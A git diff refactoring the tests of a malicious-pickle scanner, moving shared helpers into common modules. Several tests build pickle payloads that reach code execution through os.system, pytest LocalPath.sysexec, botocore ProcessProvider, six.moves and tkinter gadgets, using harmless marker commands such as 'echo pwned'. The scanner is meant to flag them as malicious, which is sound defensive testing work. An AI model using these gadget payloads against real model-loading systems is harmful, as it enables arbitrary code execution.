"ipaddress", + "name": "IPv4Address", + "import_reference": "ipaddress.IPv4Address", + }, + { + "module": "builtins", + "name": name, + "import_reference": f"builtins.{name}", + }, + ] + direct_invocations = [ + { + "module": "ipaddress", + "name": "IPv4Address", + "positional_arg_count": 1, + }, + { + "module": "builtins", + "name": name, + "positional_arg_count": 2, + }, + ] + protocol_invocations = [ + *direct_invocations, + { + "module": "ipaddress", + "name": "IPv4Address.__format__", + "positional_arg_count": 1, + }, + ] + + assert call_graph.find_dangerous_call_graphs(import_references, direct_invocations) == () + + findings = call_graph.find_dangerous_call_graphs(import_references, protocol_invocations) + + assert len(findings) == 1 + assert findings[0].module == "ipaddress" + assert findings[0].name == "IPv4Address.__format__" + assert findings[0].sink == "builtins.__import__" + assert findings[0].call_path == ("ipaddress.IPv4Address.__format__", "builtins.__import__") + + +def _assert_isolated_python(tmp_path: Path, command: list[str]) -> None: + result = subprocess.run( + command, + cwd=str(tmp_path.parent), + env={key: value for key, value in os.environ.items() if key != "PYTHONPATH"}, + check=False, + capture_output=True, + text=True, + timeout=30, + ) + assert result.returncode == 0, result.stderr + + +def _assert_wrapper_import_fallback(entrypoint: str, wrapper: str, sink: str) -> None: + calls = call_graph._calls_for_function(entrypoint) or () + + assert wrapper in calls + assert call_graph._find_sink_path(entrypoint) == ( + entrypoint, + wrapper, + sink, + ) + + +def _is_module_attribute_guard(statement: ast.stmt, *, module_name: str, attribute_name: str) -> bool: + if not isinstance(statement, ast.If) or not isinstance(statement.test, ast.Call): + return False + test = statement.test + return ( + isinstance(test.func, ast.Name) + and test.func.id == "hasattr" + and len(test.args) == 2 + and isinstance(test.args[0], ast.Name) + and test.args[0].id == module_name + and isinstance(test.args[1], ast.Constant) + and test.args[1].value == attribute_name + ) + + +def _nested_defaultdict_format_payload(*, method_name: str, template: str) -> bytes: + return b"".join( + [ + b"\x80\x04", + _global_operand("collections", "defaultdict"), + _global_operand("builtins", "help"), + b"\x85R", + b"\x94", + b"0", + b"}", + b"\x94", + _unicode_operand("present"), + b"h\x00", + b"s", + b"0", + _global_operand("builtins", method_name), + _args_tuple(_unicode_operand(template), b"h\x01"), + b"R.", + ] + ) + + +def _write_iterator_pydoc(module_dir: Path, marker: Path, marker_content: str, values_literal: str) -> None: + (module_dir / "pydoc.py").write_text( + "from pathlib import Path\n" + f"Path({str(marker)!r}).write_text({marker_content!r})\n" + f"_values = {values_literal}\n" + "def help(*args, **kwargs):\n" + " return _values.pop(0) if _values else 'stop'\n", + encoding="utf-8", + ) + + +def _assert_rewritten_call_graph( + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, + module_name: str, + safe_source: str, + updated_source: str, + dangerous_source: str, + sink: str, +) -> None: + module_dir = tmp_path / "modules" + module_dir.mkdir() + module_path = module_dir / f"{module_name}.py" + module_path.write_text("def invoke(command):\n return command\n", encoding="utf-8") + monkeypatch.syspath_prepend(str(module_dir)) + importlib.invalidate_caches() + _clear_call_graph_caches() + payload = _global_call_payload(module_name, "invoke", _unicode_operand("echo rewritten")) + + try: + safe_report = scan_bytes(payload, source=safe_source) + + module_path.write_text(updated_source, encoding="utf-8") + importlib.invalidate_caches() + dangerous_report = scan_bytes(payload, source=dangerous_source) + finally: + _clear_call_graph_caches() + + assert safe_report.verdict == SafetyVerdict.SUSPICIOUS + assert not _has_critical_call_graph_finding(safe_report, module_name, "invoke", sink) + assert dangerous_report.verdict == SafetyVerdict.MALICIOUS + assert _has_critical_call_graph_finding(dangerous_report, module_name, "invoke", sink) diff --git a/packages/modelaudit-picklescan/tests/test_call_graph_instance_defaults.py b/packages/modelaudit-picklescan/tests/test_call_graph_instance_defaults.py index 85a058f68..06dbccf3e 100644 --- a/packages/modelaudit-picklescan/tests/test_call_graph_instance_defaults.py +++ b/packages/modelaudit-picklescan/tests/test_call_graph_instance_defaults.py @@ -11,8 +11,14 @@ from pathlib import Path import pytest - -from modelaudit_picklescan import PickleReport, SafetyVerdict, Severity, scan_bytes +from pickle_test_helpers import ( + _global_operand, + _has_critical_call_graph_finding, + _text_operand, + _tuple_payload_operands, +) + +from modelaudit_picklescan import SafetyVerdict, scan_bytes from modelaudit_picklescan.api import _RUST_EXTENSION_MODULE from modelaudit_picklescan.call_graph import _calls_for_function, _find_sink_path @@ -28,44 +34,8 @@ ] -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - -def _binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - -def _text_operand(value: str) -> bytes: - data = value.encode() - if len(data) <= 0xFF: - return _short_binunicode(data) - return _binunicode(data) - - -def _global_operand(module: str, name: str) -> bytes: - return _text_operand(module) + _text_operand(name) + b"\x93" - - -def _tuple_payload_operands(operands: list[bytes]) -> bytes: - return b"(" + b"".join(operands) + b"t" - - def _botocore_process_provider_operand() -> bytes: - return b"".join( - [ - _global_operand("botocore.credentials", "ProcessProvider"), - _tuple_payload_operands( - [ - _text_operand("default"), - _global_operand("builtins", "dict"), - ] - ), - b"R", - ] - ) + return _process_provider_operand(module_name="botocore.credentials", class_name="ProcessProvider") def _botocore_process_provider_control_payload() -> bytes: @@ -96,18 +66,7 @@ def _botocore_process_provider_rce_payload(marker: Path) -> tuple[bytes, str]: def _aiobotocore_process_provider_operand() -> bytes: - return b"".join( - [ - _global_operand("aiobotocore.credentials", "AioProcessProvider"), - _tuple_payload_operands( - [ - _text_operand("default"), - _global_operand("builtins", "dict"), - ] - ), - b"R", - ] - ) + return _process_provider_operand(module_name="aiobotocore.credentials", class_name="AioProcessProvider") def _aiobotocore_process_provider_control_payload() -> bytes: @@ -178,17 +137,6 @@ def _assert_pickle_payload_executes_in_subprocess( assert marker.read_text() == marker_content -def _has_critical_call_graph_finding(report: PickleReport, module: str, name: str, sink: str) -> bool: - return any( - finding.severity == Severity.CRITICAL - and finding.rule_code == "DANGEROUS_CALL_GRAPH" - and finding.details.get("module") == module - and finding.details.get("name") == name - and finding.details.get("sink") == sink - for finding in report.findings - ) - - def test_call_graph_resolves_constructor_default_instance_aliases() -> None: calls = _calls_for_function("botocore.credentials.ProcessProvider._retrieve_credentials_using") assert calls is not None @@ -270,3 +218,18 @@ def test_scan_bytes_blocks_aiobotocore_anyio_backend_rce(tmp_path: Path) -> None assert not marker.exists() _assert_pickle_payload_executes_in_subprocess(payload, marker, marker_content, tmp_path) + + +def _process_provider_operand(*, module_name: str, class_name: str) -> bytes: + return b"".join( + [ + _global_operand(module_name, class_name), + _tuple_payload_operands( + [ + _text_operand("default"), + _global_operand("builtins", "dict"), + ] + ), + b"R", + ] + ) diff --git a/packages/modelaudit-picklescan/tests/test_call_graph_local_imports.py b/packages/modelaudit-picklescan/tests/test_call_graph_local_imports.py index 39cda9558..99b0c4f6d 100644 --- a/packages/modelaudit-picklescan/tests/test_call_graph_local_imports.py +++ b/packages/modelaudit-picklescan/tests/test_call_graph_local_imports.py @@ -3,14 +3,20 @@ from __future__ import annotations import pickle -import shlex import sys from importlib.util import find_spec from pathlib import Path import pytest - -from modelaudit_picklescan import PickleReport, SafetyVerdict, Severity, scan_bytes +from pickle_test_helpers import ( + _global_operand, + _has_critical_call_graph_finding, + _shell_command, + _text_operand, + _tuple_payload_operands, +) + +from modelaudit_picklescan import SafetyVerdict, scan_bytes from modelaudit_picklescan.api import _RUST_EXTENSION_MODULE from modelaudit_picklescan.call_graph import _calls_for_function, _find_sink_path @@ -26,35 +32,6 @@ ] -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - -def _binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - -def _text_operand(value: str) -> bytes: - data = value.encode() - if len(data) <= 0xFF: - return _short_binunicode(data) - return _binunicode(data) - - -def _global_operand(module: str, name: str) -> bytes: - return _text_operand(module) + _text_operand(name) + b"\x93" - - -def _tuple_payload_operands(operands: list[bytes]) -> bytes: - return b"(" + b"".join(operands) + b"t" - - -def _shell_command(marker: Path, marker_content: str) -> str: - return f"printf {shlex.quote(marker_content)} > {shlex.quote(str(marker))}" - - def _pytest_localpath_payload(executable: str) -> bytes: return b"".join( [ @@ -83,17 +60,6 @@ def _pytest_localpath_sysexec_payload(marker: Path) -> tuple[bytes, str]: return payload, marker_content -def _has_critical_call_graph_finding(report: PickleReport, module: str, name: str, sink: str) -> bool: - return any( - finding.severity == Severity.CRITICAL - and finding.rule_code == "DANGEROUS_CALL_GRAPH" - and finding.details.get("module") == module - and finding.details.get("name") == name - and finding.details.get("sink") == sink - for finding in report.findings - ) - - def test_call_graph_resolves_function_local_import_aliases() -> None: assert "subprocess.Popen" in (_calls_for_function("_pytest._py.path.LocalPath.sysexec") or ()) assert _find_sink_path("_pytest._py.path.LocalPath.sysexec") == ( diff --git a/packages/modelaudit-picklescan/tests/test_call_graph_safe_spec_resolution.py b/packages/modelaudit-picklescan/tests/test_call_graph_safe_spec_resolution.py index da7cc586f..8c5daf616 100644 --- a/packages/modelaudit-picklescan/tests/test_call_graph_safe_spec_resolution.py +++ b/packages/modelaudit-picklescan/tests/test_call_graph_safe_spec_resolution.py @@ -34,17 +34,13 @@ from zipimport import zipimporter import pytest +from pickle_test_helpers import _clear_call_graph_caches import modelaudit_picklescan.api as package_api import modelaudit_picklescan.call_graph as call_graph from modelaudit_picklescan import PickleReport, SafetyVerdict, ScanStatus -def _clear_call_graph_caches() -> None: - for function in call_graph._SOURCE_SENSITIVE_CACHED_FUNCTIONS: - function.cache_clear() - - @pytest.mark.skipif(os.name == "nt", reason="Windows ctime differs across stat views") def test_cross_view_file_identity_keeps_posix_ctime() -> None: """POSIX cross-view checks must detect metadata-only inode reuse.""" @@ -203,31 +199,11 @@ def _has_source_unavailable_notice(report: PickleReport, module: str, name: str) def _fail_builtin_find_spec(calls: list[str]) -> Any: - def find_spec( - cls: type[object], - fullname: str, - path: object | None = None, - target: object | None = None, - ) -> ModuleSpec | None: - del cls, path, target - calls.append(fullname) - raise AssertionError(f"BuiltinImporter.find_spec called for {fullname!r}") - - return classmethod(find_spec) + return _fail_importer_find_spec(calls, "BuiltinImporter.find_spec called for ") def _fail_frozen_find_spec(calls: list[str]) -> Any: - def find_spec( - cls: type[object], - fullname: str, - path: object | None = None, - target: object | None = None, - ) -> ModuleSpec | None: - del cls, path, target - calls.append(fullname) - raise AssertionError(f"FrozenImporter.find_spec called for {fullname!r}") - - return classmethod(find_spec) + return _fail_importer_find_spec(calls, "FrozenImporter.find_spec called for ") def test_call_graph_enrichment_does_not_invoke_meta_path_finders_for_pickle_names( @@ -802,12 +778,7 @@ def test_loaded_site_package_reference_after_startup_uses_source_owner() -> None assert trusted_reconstruct_modules """ - result = subprocess.run( - [sys.executable, "-c", script], - check=False, - capture_output=True, - text=True, - ) + result = _run_python_script(script) if result.returncode == 99: pytest.skip("NumPy is not installed") if result.returncode == 98: @@ -988,12 +959,7 @@ def hostile_getattribute(self, name): assert call_graph._loaded_trusted_reference_matches_baseline("tempfile", "gettempdir") is False assert calls == [] """ - result = subprocess.run( - [sys.executable, "-c", script], - check=False, - capture_output=True, - text=True, - ) + result = _run_python_script(script) assert result.returncode == 0, result.stderr @@ -1163,12 +1129,7 @@ def __get__(self, instance, owner): ) assert calls == [] """ - result = subprocess.run( - [sys.executable, "-c", script], - check=False, - capture_output=True, - text=True, - ) + result = _run_python_script(script) assert result.returncode == 0, result.stderr @@ -1798,16 +1759,7 @@ def test_zipimporter_directory_validation_does_not_execute_mutated_reader_global files = _zipimporter_directory_files(finder) assert call_graph._zipimport_archive_files_match(str(archive_path), files) - zipimport_namespace = ModuleType.__getattribute__(zipimport, "__dict__") - original_unpack = dict.get(zipimport_namespace, "_unpack_uint32") - assert callable(original_unpack) - calls: list[bytes] = [] - - def poisoned_unpack(value: bytes) -> int: - calls.append(value) - return cast(Callable[[bytes], int], original_unpack)(value) - - monkeypatch.setitem(zipimport_namespace, "_unpack_uint32", poisoned_unpack) + calls = _poison_zipimport_unpack(monkeypatch) assert call_graph._zipimport_archive_files_match(str(archive_path), files) is False with _standard_import_runtime( @@ -1827,16 +1779,7 @@ def test_uncached_zip_path_does_not_construct_importer_with_mutated_runtime( ) -> None: archive_path = tmp_path / "uncached-mutated-runtime.zip" _write_zipimporter_archive(archive_path, "trusted_module", include_module=True) - zipimport_namespace = ModuleType.__getattribute__(zipimport, "__dict__") - original_unpack = dict.get(zipimport_namespace, "_unpack_uint32") - assert callable(original_unpack) - calls: list[bytes] = [] - - def poisoned_unpack(value: bytes) -> int: - calls.append(value) - return cast(Callable[[bytes], int], original_unpack)(value) - - monkeypatch.setitem(zipimport_namespace, "_unpack_uint32", poisoned_unpack) + calls = _poison_zipimport_unpack(monkeypatch) with _standard_import_runtime( monkeypatch, module="trusted_module", @@ -2986,12 +2929,7 @@ def get(self, key, default=None): assert origin_kind is None assert calls == [] """ - result = subprocess.run( - [sys.executable, "-c", script], - check=False, - capture_output=True, - text=True, - ) + result = _run_python_script(script) assert result.returncode == 0, result.stderr @@ -3027,12 +2965,7 @@ def __contains__(self, key): assert can_execute is True assert calls == [] """ - result = subprocess.run( - [sys.executable, "-c", script], - check=False, - capture_output=True, - text=True, - ) + result = _run_python_script(script) assert result.returncode == 0, result.stderr @@ -3738,3 +3671,40 @@ def __getattribute__(self, name: str) -> object: "analysis": "python_call_graph", "analysis_incomplete": True, } + + +def _fail_importer_find_spec(calls: list[str], message_prefix: str) -> Any: + def find_spec( + cls: type[object], + fullname: str, + path: object | None = None, + target: object | None = None, + ) -> ModuleSpec | None: + del cls, path, target + calls.append(fullname) + raise AssertionError(f"{message_prefix}{fullname!r}") + + return classmethod(find_spec) + + +def _run_python_script(script: str) -> subprocess.CompletedProcess[str]: + return subprocess.run( + [sys.executable, "-c", script], + check=False, + capture_output=True, + text=True, + ) + + +def _poison_zipimport_unpack(monkeypatch: pytest.MonkeyPatch) -> list[bytes]: + zipimport_namespace = ModuleType.__getattribute__(zipimport, "__dict__") + original_unpack = dict.get(zipimport_namespace, "_unpack_uint32") + assert callable(original_unpack) + calls: list[bytes] = [] + + def poisoned_unpack(value: bytes) -> int: + calls.append(value) + return cast(Callable[[bytes], int], original_unpack)(value) + + monkeypatch.setitem(zipimport_namespace, "_unpack_uint32", poisoned_unpack) + return calls diff --git a/packages/modelaudit-picklescan/tests/test_call_graph_six.py b/packages/modelaudit-picklescan/tests/test_call_graph_six.py index 4cc6845a4..f81939a9f 100644 --- a/packages/modelaudit-picklescan/tests/test_call_graph_six.py +++ b/packages/modelaudit-picklescan/tests/test_call_graph_six.py @@ -6,23 +6,21 @@ import shlex import subprocess import sys -from importlib.util import find_spec from pathlib import Path import pytest +from pickle_test_helpers import ( + _global_operand, + _has_critical_call_graph_finding, + _has_module, + _text_operand, + _tuple_payload_operands, +) -from modelaudit_picklescan import PickleReport, SafetyVerdict, Severity, scan_bytes +from modelaudit_picklescan import SafetyVerdict, scan_bytes from modelaudit_picklescan.api import _RUST_EXTENSION_MODULE from modelaudit_picklescan.call_graph import _call_graph_entrypoints, _find_sink_path, _trusted_module_origin_kind - -def _has_module(module: str) -> bool: - try: - return find_spec(module) is not None - except ModuleNotFoundError: - return False - - pytestmark = [ pytest.mark.skipif( not _has_module(_RUST_EXTENSION_MODULE), @@ -35,31 +33,6 @@ def _has_module(module: str) -> bool: ] -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - -def _binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - -def _text_operand(value: str) -> bytes: - data = value.encode() - if len(data) <= 0xFF: - return _short_binunicode(data) - return _binunicode(data) - - -def _global_operand(module: str, name: str) -> bytes: - return _text_operand(module) + _text_operand(name) + b"\x93" - - -def _tuple_payload_operands(operands: list[bytes]) -> bytes: - return b"(" + b"".join(operands) + b"t" - - def _six_moves_getoutput_payload(module: str, name: str, marker: Path) -> tuple[bytes, str]: marker_content = "owned-by-six-moves-getoutput" command = f"printf {shlex.quote(marker_content)} > {shlex.quote(str(marker))}" @@ -136,17 +109,6 @@ def _constructed_bytes_control_payload(values: bytes) -> bytes: return b"\x80\x04" + _constructed_bytes_operand(values) + b"." -def _has_critical_call_graph_finding(report: PickleReport, module: str, name: str, sink: str) -> bool: - return any( - finding.severity == Severity.CRITICAL - and finding.rule_code == "DANGEROUS_CALL_GRAPH" - and finding.details.get("module") == module - and finding.details.get("name") == name - and finding.details.get("sink") == sink - for finding in report.findings - ) - - def _assert_pickle_payload_executes_in_subprocess( payload: bytes, marker: Path, @@ -197,23 +159,12 @@ def test_call_graph_resolves_six_moves_getoutput_alias(reference: str) -> None: @pytest.mark.parametrize( ("reference", "sink"), [ + # cPickle load and loads aliases. ("six.moves.cPickle.load", "pickle.load"), ("six.moves.cPickle.loads", "pickle.loads"), ("botocore.vendored.six.moves.cPickle.load", "pickle.load"), ("botocore.vendored.six.moves.cPickle.loads", "pickle.loads"), - ], -) -def test_call_graph_resolves_six_moves_cpickle_aliases(reference: str, sink: str) -> None: - assert _call_graph_entrypoints(reference) == (sink,) - - path = _find_sink_path(reference) - assert path is not None - assert path[-1] == sink - - -@pytest.mark.parametrize( - ("reference", "sink"), - [ + # Dangerous builtins aliases. ("six.moves.builtins.__import__", "builtins.__import__"), ("six.moves.builtins.compile", "builtins.compile"), ("six.moves.builtins.eval", "builtins.eval"), @@ -224,7 +175,7 @@ def test_call_graph_resolves_six_moves_cpickle_aliases(reference: str, sink: str ("botocore.vendored.six.moves.builtins.exec", "builtins.exec"), ], ) -def test_call_graph_resolves_six_moves_builtins_dangerous_aliases(reference: str, sink: str) -> None: +def test_call_graph_resolves_six_moves_dangerous_aliases(reference: str, sink: str) -> None: assert _call_graph_entrypoints(reference) == (sink,) path = _find_sink_path(reference) diff --git a/packages/modelaudit-picklescan/tests/test_call_graph_tkinter.py b/packages/modelaudit-picklescan/tests/test_call_graph_tkinter.py index 6957ef4be..ab5f440c3 100644 --- a/packages/modelaudit-picklescan/tests/test_call_graph_tkinter.py +++ b/packages/modelaudit-picklescan/tests/test_call_graph_tkinter.py @@ -3,15 +3,21 @@ from __future__ import annotations import pickle -import shlex import sys from collections.abc import Callable from importlib.util import find_spec from pathlib import Path import pytest +from pickle_test_helpers import ( + _global_operand, + _has_critical_call_graph_finding, + _shell_command, + _text_operand, + _tuple_payload_operands, +) -from modelaudit_picklescan import PickleReport, SafetyVerdict, Severity, scan_bytes +from modelaudit_picklescan import SafetyVerdict, scan_bytes from modelaudit_picklescan.api import _RUST_EXTENSION_MODULE from modelaudit_picklescan.call_graph import _find_sink_path @@ -21,35 +27,6 @@ ) -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - -def _binunicode(data: bytes) -> bytes: - return b"X" + len(data).to_bytes(4, "little") + data - - -def _text_operand(value: str) -> bytes: - data = value.encode() - if len(data) <= 0xFF: - return _short_binunicode(data) - return _binunicode(data) - - -def _global_operand(module: str, name: str) -> bytes: - return _text_operand(module) + _text_operand(name) + b"\x93" - - -def _tuple_payload_operands(operands: list[bytes]) -> bytes: - return b"(" + b"".join(operands) + b"t" - - -def _shell_command(marker: Path, marker_content: str) -> str: - return f"printf {shlex.quote(marker_content)} > {shlex.quote(str(marker))}" - - def _command_tuple(command: str) -> bytes: return _tuple_payload_operands( [ @@ -108,17 +85,6 @@ def _tkinter_misc_getconfigure_payload(marker: Path, *, include_call: bool) -> t return payload, marker_content -def _has_critical_call_graph_finding(report: PickleReport, module: str, name: str, sink: str) -> bool: - return any( - finding.severity == Severity.CRITICAL - and finding.rule_code == "DANGEROUS_CALL_GRAPH" - and finding.details.get("module") == module - and finding.details.get("name") == name - and finding.details.get("sink") == sink - for finding in report.findings - ) - - def test_call_graph_marks_parameter_controlled_tcl_dispatchers() -> None: unbind_path = _find_sink_path("tkinter.Misc._unbind") if unbind_path is not None: diff --git a/packages/modelaudit-picklescan/tests/test_known_size_streams.py b/packages/modelaudit-picklescan/tests/test_known_size_streams.py index 1336a871e..b6949433a 100644 --- a/packages/modelaudit-picklescan/tests/test_known_size_streams.py +++ b/packages/modelaudit-picklescan/tests/test_known_size_streams.py @@ -9,20 +9,15 @@ from typing import Any import pytest +from framework_fixtures import SystemCommandPayload import modelaudit_picklescan.api as package_api from modelaudit_picklescan import PickleScanner, SafetyVerdict, ScanStatus, scan_file -class MaliciousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - # Deliberately unsafe reducer used to verify malicious pickle handling. - return (os.system, ("echo pwned",)) - - def test_scan_stream_declared_size_trailing_payload_fails_closed() -> None: benign_prefix = pickle.dumps({"safe": True}, protocol=4) - payload = benign_prefix + pickle.dumps(MaliciousPayload(), protocol=4) + payload = benign_prefix + pickle.dumps(SystemCommandPayload("echo pwned", lambda: os.system), protocol=4) stream = io.BytesIO(payload) report = PickleScanner().scan_stream( @@ -114,7 +109,7 @@ def tell(self) -> int: def test_scan_stream_probe_error_preserves_malicious_declared_payload() -> None: - payload = pickle.dumps(MaliciousPayload(), protocol=4) + payload = pickle.dumps(SystemCommandPayload("echo pwned", lambda: os.system), protocol=4) class ProbeErrorStream(io.BytesIO): def read(self, size: int | None = -1) -> bytes: @@ -140,7 +135,9 @@ def test_scan_file_uses_open_descriptor_size_after_path_replacement( ) -> None: payload_path = tmp_path / "race.pkl" benign_prefix = pickle.dumps({"safe": True}, protocol=4) - replacement_payload = benign_prefix + pickle.dumps(MaliciousPayload(), protocol=4) + replacement_payload = benign_prefix + pickle.dumps( + SystemCommandPayload("echo pwned", lambda: os.system), protocol=4 + ) payload_path.write_bytes(benign_prefix) original_open = Path.open replaced = False @@ -169,7 +166,7 @@ def test_scan_file_keeps_plain_descriptor_after_path_replacement( ) -> None: payload_path = tmp_path / "descriptor.pkl" replacement_path = tmp_path / "replacement.pkl" - malicious_payload = pickle.dumps(MaliciousPayload(), protocol=4) + malicious_payload = pickle.dumps(SystemCommandPayload("echo pwned", lambda: os.system), protocol=4) payload_path.write_bytes(malicious_payload) replacement_path.write_bytes(pickle.dumps({"safe": True}, protocol=4)) original_is_zipfile = package_api.zipfile.is_zipfile @@ -198,7 +195,7 @@ def test_scan_file_keeps_zip_descriptor_after_path_replacement( ) -> None: archive_path = tmp_path / "descriptor.pt" replacement_path = tmp_path / "replacement.pkl" - malicious_payload = pickle.dumps(MaliciousPayload(), protocol=4) + malicious_payload = pickle.dumps(SystemCommandPayload("echo pwned", lambda: os.system), protocol=4) with zipfile.ZipFile(archive_path, "w") as archive: archive.writestr("data.pkl", malicious_payload) archive.writestr("version", "3\n") diff --git a/packages/modelaudit-picklescan/tests/test_nested_budget_limits.py b/packages/modelaudit-picklescan/tests/test_nested_budget_limits.py index 2f4d1bb55..bfdbe64bb 100644 --- a/packages/modelaudit-picklescan/tests/test_nested_budget_limits.py +++ b/packages/modelaudit-picklescan/tests/test_nested_budget_limits.py @@ -5,15 +5,10 @@ import pickle import pytest +from framework_fixtures import SystemCommandPayload from modelaudit_picklescan import SafetyVerdict, ScanOptions, ScanStatus, scan_bytes - -class MaliciousPayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - return os.system, ("echo pwned",) - - LONG_PROTOCOL0_LITERAL_PAYLOADS = [ pytest.param(b"cattacker\nfactory\n(V" + (b"A" * 2000) + b"\ntR.", id="unicode"), pytest.param( @@ -48,7 +43,7 @@ def test_minimum_nested_budget_fails_closed( encoding: str, expected_rule: str, ) -> None: - nested_payload = pickle.dumps(MaliciousPayload(), protocol=protocol) + nested_payload = pickle.dumps(SystemCommandPayload("echo pwned", lambda: os.system), protocol=protocol) nested_value: bytes | str if encoding == "raw": nested_value = nested_payload diff --git a/packages/modelaudit-picklescan/tests/test_protocol0_line_operands.py b/packages/modelaudit-picklescan/tests/test_protocol0_line_operands.py index 40e8ef763..7cbc8b008 100644 --- a/packages/modelaudit-picklescan/tests/test_protocol0_line_operands.py +++ b/packages/modelaudit-picklescan/tests/test_protocol0_line_operands.py @@ -11,6 +11,9 @@ from pathlib import Path import pytest +from pickle_test_helpers import ( + _proto0_string_literal, +) from modelaudit_picklescan import SafetyVerdict, ScanOptions, ScanStatus, scan_bytes, scan_file from modelaudit_picklescan import api as picklescan_api @@ -57,11 +60,6 @@ def _benign_long_scalar_protocol0_pickle(opcode: bytes) -> bytes: return prefix + b"." -def _proto0_string_literal(value: bytes) -> bytes: - literal = value.decode("latin-1").encode("unicode_escape").replace(b"'", b"\\'") - return b"S'" + literal + b"'\n." - - def _binbytes_literal_pickle(value: bytes) -> bytes: return b"B" + struct.pack(" None: + report = scan_bytes( + pickle.dumps(container(payload), protocol=5), + source=source, + ) + + assert report.status == ScanStatus.INCONCLUSIVE + assert report.verdict == SafetyVerdict.MALICIOUS + assert any(finding.rule_code == "PERSISTENT_ID" for finding in report.findings) + assert any( + finding.rule_code == "S213" and finding.details.get("analysis_incomplete") is True + for finding in report.findings + ) diff --git a/packages/modelaudit-picklescan/tests/test_rust_engine.py b/packages/modelaudit-picklescan/tests/test_rust_engine.py index 52dbe8af1..3937d2968 100644 --- a/packages/modelaudit-picklescan/tests/test_rust_engine.py +++ b/packages/modelaudit-picklescan/tests/test_rust_engine.py @@ -15,6 +15,9 @@ malicious_reduce_payload, prefix_truncation_payloads, ) +from pickle_test_helpers import ( + _short_binunicode, +) from modelaudit_picklescan import SafetyVerdict, ScanOptions, ScanStatus, scan_bytes, scan_file from modelaudit_picklescan.api import _RUST_EXTENSION_MODULE @@ -74,12 +77,6 @@ def _rust_source_text() -> str: return "\n".join(path.read_text() for path in sorted(rust_src.glob("*.rs"))) -def _short_binunicode(data: bytes) -> bytes: - if len(data) > 0xFF: - raise ValueError("SHORT_BINUNICODE helper accepts at most 255 bytes") - return b"\x8c" + bytes([len(data)]) + data - - def _binary_opcode_os_system_reduce_payload() -> bytes: return _short_binunicode(b"os") + _short_binunicode(b"system") + b"\x93" + _short_binunicode(b"true") + b"\x85R." diff --git a/tests/analysis/test_analysis_modules.py b/tests/analysis/test_analysis_modules.py index 12f597ac6..e1ec140f3 100644 --- a/tests/analysis/test_analysis_modules.py +++ b/tests/analysis/test_analysis_modules.py @@ -63,25 +63,11 @@ def test_semantic_analyzer_basic(self) -> None: def test_semantic_analyzer_resolves_import_aliases(self) -> None: """Dangerous calls made through imported aliases should remain visible.""" - from modelaudit.analysis import CodeRiskLevel, SemanticAnalyzer - - analyzer = SemanticAnalyzer() - - risk_level, details = analyzer.analyze_code_behavior("import os as o\no.system('id')", {}) - - assert risk_level != CodeRiskLevel.SAFE - assert "os.system" in details["function_calls"] + _assert_semantic_import_alias_risk(("import os as o\no.system('id')"), ("os.system")) def test_semantic_analyzer_preserves_bare_builtin_aliases(self) -> None: """Dangerous builtins imported from builtins should keep their dangerous names.""" - from modelaudit.analysis import CodeRiskLevel, SemanticAnalyzer - - analyzer = SemanticAnalyzer() - - risk_level, details = analyzer.analyze_code_behavior("from builtins import eval\neval(user_input)", {}) - - assert risk_level != CodeRiskLevel.SAFE - assert "eval" in details["function_calls"] + _assert_semantic_import_alias_risk(("from builtins import eval\neval(user_input)"), ("eval")) def test_semantic_analyzer_scopes_safe_patterns_to_operation(self) -> None: """A safe eval should not pardon an unrelated dangerous operation.""" @@ -97,17 +83,10 @@ def test_semantic_analyzer_scopes_safe_patterns_to_operation(self) -> None: def test_semantic_analyzer_updates_aliases_after_rebinding(self) -> None: """Assignments should update imported aliases before later calls are normalized.""" - from modelaudit.analysis import CodeRiskLevel, SemanticAnalyzer - - analyzer = SemanticAnalyzer() - risk_level, details = analyzer.analyze_code_behavior( - "import math as os\nimport os as real_os\nos = real_os\nos.system('id')", - {}, + _assert_semantic_import_alias_risk( + ("import math as os\nimport os as real_os\nos = real_os\nos.system('id')"), ("os.system") ) - assert risk_level != CodeRiskLevel.SAFE - assert "os.system" in details["function_calls"] - def test_semantic_analyzer_drops_aliases_after_shadowing(self) -> None: """Reassigned names should no longer be treated as imported call targets.""" from modelaudit.analysis import CodeRiskLevel, SemanticAnalyzer @@ -155,48 +134,14 @@ def test_integrated_analyzer_treats_high_safety_confidence_as_not_suspicious( monkeypatch: pytest.MonkeyPatch, ) -> None: """The final suspiciousness flag should agree with the safety-confidence scale.""" - from modelaudit.analysis import IntegratedAnalyzer - from modelaudit.analysis.unified_context import UnifiedMLContext - - context = UnifiedMLContext(Path("test.pkl"), 1024, "pickle") - analyzer = IntegratedAnalyzer() - monkeypatch.setattr(analyzer, "_analyze_ml_context", lambda *_args: {"confidence": 0.9, "reasoning": []}) - monkeypatch.setattr(analyzer, "_analyze_anomalies", lambda *_args: {"confidence": 0.9, "reasoning": []}) - monkeypatch.setattr( - analyzer, - "_analyze_framework_patterns", - lambda *_args: {"confidence": 0.9, "reasoning": []}, - ) - - result = analyzer.analyze_suspicious_pattern("x", "token", context) - - assert result.confidence == pytest.approx(0.9) - assert result.risk_level == "safe" - assert result.is_suspicious is False + _assert_integrated_analysis_safety_confidence(monkeypatch, (0.9), (0.9), (0.9), (0.9), ("safe"), (False)) def test_integrated_analyzer_treats_low_safety_confidence_as_suspicious( self, monkeypatch: pytest.MonkeyPatch, ) -> None: """Low confidence in safety should remain suspicious.""" - from modelaudit.analysis import IntegratedAnalyzer - from modelaudit.analysis.unified_context import UnifiedMLContext - - context = UnifiedMLContext(Path("test.pkl"), 1024, "pickle") - analyzer = IntegratedAnalyzer() - 